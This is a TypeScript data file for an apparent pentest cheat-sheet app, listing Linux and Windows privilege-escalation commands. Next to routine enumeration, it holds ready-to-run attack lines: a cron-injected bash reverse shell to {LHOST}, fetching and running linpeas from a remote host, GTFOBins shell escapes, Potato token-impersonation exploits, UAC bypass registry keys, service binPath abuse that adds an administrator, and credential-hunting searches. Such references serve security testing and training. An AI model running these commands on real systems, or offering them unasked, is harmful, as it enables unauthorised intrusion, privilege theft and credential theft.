import { Section } from "./types";

export const privescSection: Section = {
  id: "privesc",
  title: "Privilege Escalation",
  slug: "privesc",
  groups: [
    { title: "Linux Quick Wins", commands: [
      { id: "pri-1", cmd: "sudo -l", description: "Check sudo permissions.", tags: ["linux"] },
      { id: "pri-2", cmd: "find / -perm -4000 2>/dev/null", description: "Find SUID binaries.", tags: ["linux"] },
      { id: "pri-3", cmd: "crontab -l", description: "User cron entries.", tags: ["linux"] },
      { id: "pri-4", cmd: "getcap -r / 2>/dev/null", description: "Find capabilities.", tags: ["linux"] },
      { id: "pri-5", cmd: "find / -writable -type d 2>/dev/null", description: "Writable directories.", tags: ["linux"] },
      { id: "pri-6", cmd: "uname -a", description: "Kernel version check.", tags: ["linux"] },
      { id: "pri-6a", cmd: "id && groups", description: "Identity and group checks.", tags: ["linux"] },
      { id: "pri-6b", cmd: "cat /etc/crontab", description: "System-wide cron jobs.", tags: ["linux"] },
      { id: "pri-6c", cmd: "find / -name '*.conf' -o -name '*.bak' 2>/dev/null", description: "Find potentially sensitive configs.", tags: ["linux"] },
    ]},
    { title: "Linux GTFOBins", commands: [
      { id: "pri-7", cmd: "find . -exec /bin/sh \\; -quit", description: "GTFO find shell.", tags: ["linux"] },
      { id: "pri-8", cmd: "vim -c ':!/bin/sh'", description: "GTFO vim shell.", tags: ["linux"] },
      { id: "pri-9", cmd: "python3 -c 'import os; os.system(\"/bin/sh\")'", description: "GTFO python shell.", tags: ["linux"] },
      { id: "pri-10", cmd: "awk 'BEGIN {system(\"/bin/sh\")}'", description: "GTFO awk shell.", tags: ["linux"] },
      { id: "pri-11", cmd: "less /etc/profile", description: "GTFO less shell via !sh.", tags: ["linux"] },
      { id: "pri-12", cmd: "nano", description: "GTFO nano via Ctrl+R Ctrl+X.", tags: ["linux"] },
      { id: "pri-12a", cmd: "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh", description: "GTFO tar shell.", tags: ["linux"] },
      { id: "pri-12b", cmd: "perl -e 'exec \"/bin/sh\";'", description: "GTFO perl shell.", tags: ["linux"] },
    ]},
    { title: "Linux Other Techniques", commands: [
      { id: "pri-13", cmd: "echo '* * * * * root /bin/bash -c \"bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\"' | sudo tee /etc/crontab", description: "Cron abuse reverse shell.", tags: ["linux"], hasVars: true },
      { id: "pri-14", cmd: "echo '/bin/bash' > /tmp/ls && chmod +x /tmp/ls && export PATH=/tmp:$PATH", description: "PATH hijack pattern.", tags: ["linux"] },
      { id: "pri-15", cmd: "docker run -v /:/mnt --rm -it alpine chroot /mnt sh", description: "Abuse docker group.", tags: ["linux"] },
      { id: "pri-16", cmd: "gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles", description: "Prepare LD_PRELOAD .so.", tags: ["linux"] },
      { id: "pri-16a", cmd: "find / -perm -u=s -type f 2>/dev/null | xargs -I{} basename {}", description: "List candidate SUID binaries.", tags: ["linux"] },
      { id: "pri-16b", cmd: "strings /etc/passwd", description: "Quick check for anomalous account data.", tags: ["linux"] },
    ]},
    { title: "Linux Automated", commands: [
      { id: "pri-17", cmd: "wget http://{LHOST}/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh", description: "Run LinPEAS.", tags: ["linux"], hasVars: true },
      { id: "pri-18", cmd: "lse -l 1", description: "Linux Smart Enumeration.", tags: ["linux"] },
      { id: "pri-19", cmd: "linux-exploit-suggester.sh", description: "Kernel exploit suggestions.", tags: ["linux"] },
      { id: "pri-19a", cmd: "python3 -m http.server 8000", description: "Quick host for enum scripts.", tags: ["linux"] },
      { id: "pri-19b", cmd: "pspy64", description: "Monitor privileged cron/process actions.", tags: ["linux"] },
    ]},
    { title: "Windows Enumeration", commands: [
      { id: "pri-20", cmd: "whoami /priv", description: "Privilege list.", tags: ["windows"] },
      { id: "pri-21", cmd: "systeminfo", description: "Host and patch level.", tags: ["windows"] },
      { id: "pri-22", cmd: "wmic service get name,displayname,pathname,startmode", description: "Service listing.", tags: ["windows"] },
      { id: "pri-23", cmd: "wmic product get name,version,vendor", description: "Installed software list.", tags: ["windows"] },
      { id: "pri-24", cmd: "reg query HKLM /f password /t REG_SZ /s", description: "Registry password hunt.", tags: ["windows"] },
      { id: "pri-24a", cmd: "whoami /groups", description: "Current token group membership.", tags: ["windows"] },
      { id: "pri-24b", cmd: "net localgroup administrators", description: "List local administrators.", tags: ["windows"] },
      { id: "pri-24c", cmd: "tasklist /svc", description: "Process and service mapping.", tags: ["windows"] },
      { id: "pri-24d", cmd: "wmic qfe get Caption,Description,HotFixID,InstalledOn", description: "Installed patches and hotfixes.", tags: ["windows"] },
      { id: "pri-24e", cmd: "netstat -ano", description: "Review listening services and PIDs.", tags: ["windows"] },
      { id: "pri-24f", cmd: "schtasks /query /fo LIST /v", description: "Enumerate scheduled tasks in detail.", tags: ["windows"] },
    ]},
    { title: "Windows Token Impersonation", commands: [
      { id: "pri-25", cmd: "PrintSpoofer64.exe -i -c cmd", description: "SeImpersonate exploit.", tags: ["windows"] },
      { id: "pri-26", cmd: "GodPotato-NET4.exe -cmd cmd", description: "GodPotato local priv esc.", tags: ["windows"] },
      { id: "pri-27", cmd: "JuicyPotatoNG.exe -t * -p cmd.exe -a '/c whoami'", description: "JuicyPotatoNG.", tags: ["windows"] },
    ]},
    { title: "Windows Service Exploitation", commands: [
      { id: "pri-28", cmd: "wmic service where 'pathname like \"% %\" and not pathname like \"\\\"%\\\"\"' get name,pathname", description: "Find unquoted service paths.", tags: ["windows"] },
      { id: "pri-29", cmd: "icacls \"C:\\Program Files\\Some Service\"", description: "Check weak permissions.", tags: ["windows"] },
      { id: "pri-30", cmd: "reg query HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", description: "AlwaysInstallElevated (HKCU).", tags: ["windows"] },
      { id: "pri-30a", cmd: "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", description: "AlwaysInstallElevated (HKLM).", tags: ["windows"] },
      { id: "pri-30b", cmd: "sc qc {SERVICE_NAME}", description: "Inspect vulnerable service configuration.", tags: ["windows"], hasVars: true },
      { id: "pri-30c", cmd: "accesschk.exe /accepteula -uwcqv \"Authenticated Users\" *", description: "Find services writable by low-priv users.", tags: ["windows"] },
      { id: "pri-30d", cmd: "sc config {SERVICE_NAME} binPath= \"cmd /c net localgroup administrators {USER} /add\"", description: "Abuse weak service permissions for escalation.", tags: ["windows"], hasVars: true },
    ]},
    { title: "Windows Automated", commands: [
      { id: "pri-31", cmd: ".\\winPEASx64.exe", description: "Run winPEAS.", tags: ["windows"] },
      { id: "pri-32", cmd: "powershell -ep bypass -c \"Import-Module .\\PowerUp.ps1; Invoke-AllChecks\"", description: "PowerUp checks.", tags: ["windows"] },
      { id: "pri-33", cmd: ".\\Seatbelt.exe all", description: "Seatbelt host triage.", tags: ["windows"] },
      { id: "pri-33a", cmd: "PowerUpSQL.ps1; Get-SQLInstanceLocal", description: "Enumerate local SQL instances for abuse paths.", tags: ["windows"] },
      { id: "pri-33b", cmd: "wesng --muc-lookup systeminfo.txt", description: "Match missing patches to known exploits.", tags: ["windows"] },
    ]},
    { title: "Credential Hunting", commands: [
      { id: "pri-34", cmd: "find / -name \"*id_rsa*\" -o -name \"*.kdbx\" 2>/dev/null", description: "Find common credential artifacts on Linux.", tags: ["linux"] },
      { id: "pri-34a", cmd: "grep -R \"password\\|passwd\\|token\\|apikey\" /var/www 2>/dev/null", description: "Search sensitive strings in web roots.", tags: ["linux", "web"] },
      { id: "pri-34b", cmd: "cmdkey /list", description: "Enumerate stored Windows credentials.", tags: ["windows"] },
      { id: "pri-34c", cmd: "dir /s /b *pass* *cred* *vnc* 2>nul", description: "Locate likely credential files on Windows.", tags: ["windows"] },
    ]},
    { title: "Windows Lateral Primitives", commands: [
      { id: "pri-35", cmd: "net user {USER} {PASS} /add", description: "Create local user (if admin).", tags: ["windows"], hasVars: true },
      { id: "pri-35a", cmd: "net localgroup administrators {USER} /add", description: "Add user to local admins.", tags: ["windows"], hasVars: true },
      { id: "pri-35b", cmd: "sc qc {SERVICE_NAME}", description: "Inspect service binary and account context.", tags: ["windows"], hasVars: true },
    ]},
    { title: "Windows UAC / Token Abuse", commands: [
      { id: "pri-36", cmd: "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA", description: "Check if UAC is enabled.", tags: ["windows"] },
      { id: "pri-36a", cmd: "fodhelper.exe", description: "Trigger fodhelper UAC bypass path (when applicable).", tags: ["windows"] },
      { id: "pri-36b", cmd: "reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /d \"cmd /c start cmd\" /f", description: "Prepare ms-settings UAC bypass registry key.", tags: ["windows"] },
      { id: "pri-36c", cmd: "reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /v DelegateExecute /f", description: "Set DelegateExecute for UAC bypass.", tags: ["windows"] },
    ]},
    { title: "Windows Registry / File Permission Abuse", commands: [
      { id: "pri-37", cmd: "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\ /s /v ImagePath", description: "Inspect service binary paths from registry.", tags: ["windows"] },
      { id: "pri-37a", cmd: "icacls C:\\ /t /c | findstr /i \"(F) (M) Everyone Authenticated Users\"", description: "Find overly permissive filesystem ACLs.", tags: ["windows"] },
      { id: "pri-37b", cmd: "dir C:\\ /s /b unattended.xml sysprep.inf sysprep.xml web.config 2>nul", description: "Search for unattended/config credentials.", tags: ["windows"] },
    ]},
    {
      title: "External References (Local Exports)",
      commands: [
        { id: "pri-ref-lpe", cmd: "lpe_2026-03-29.txt", description: "Local reference export (HackTricks Linux priv esc notes). Open the file locally; not a runnable command.", tags: ["all"] },
        { id: "pri-ref-wpe", cmd: "wpe_2026-03-29.txt", description: "Local reference export (HackTricks Windows priv esc notes). Open the file locally; not a runnable command.", tags: ["all"] },
      ],
    },
  ],
};
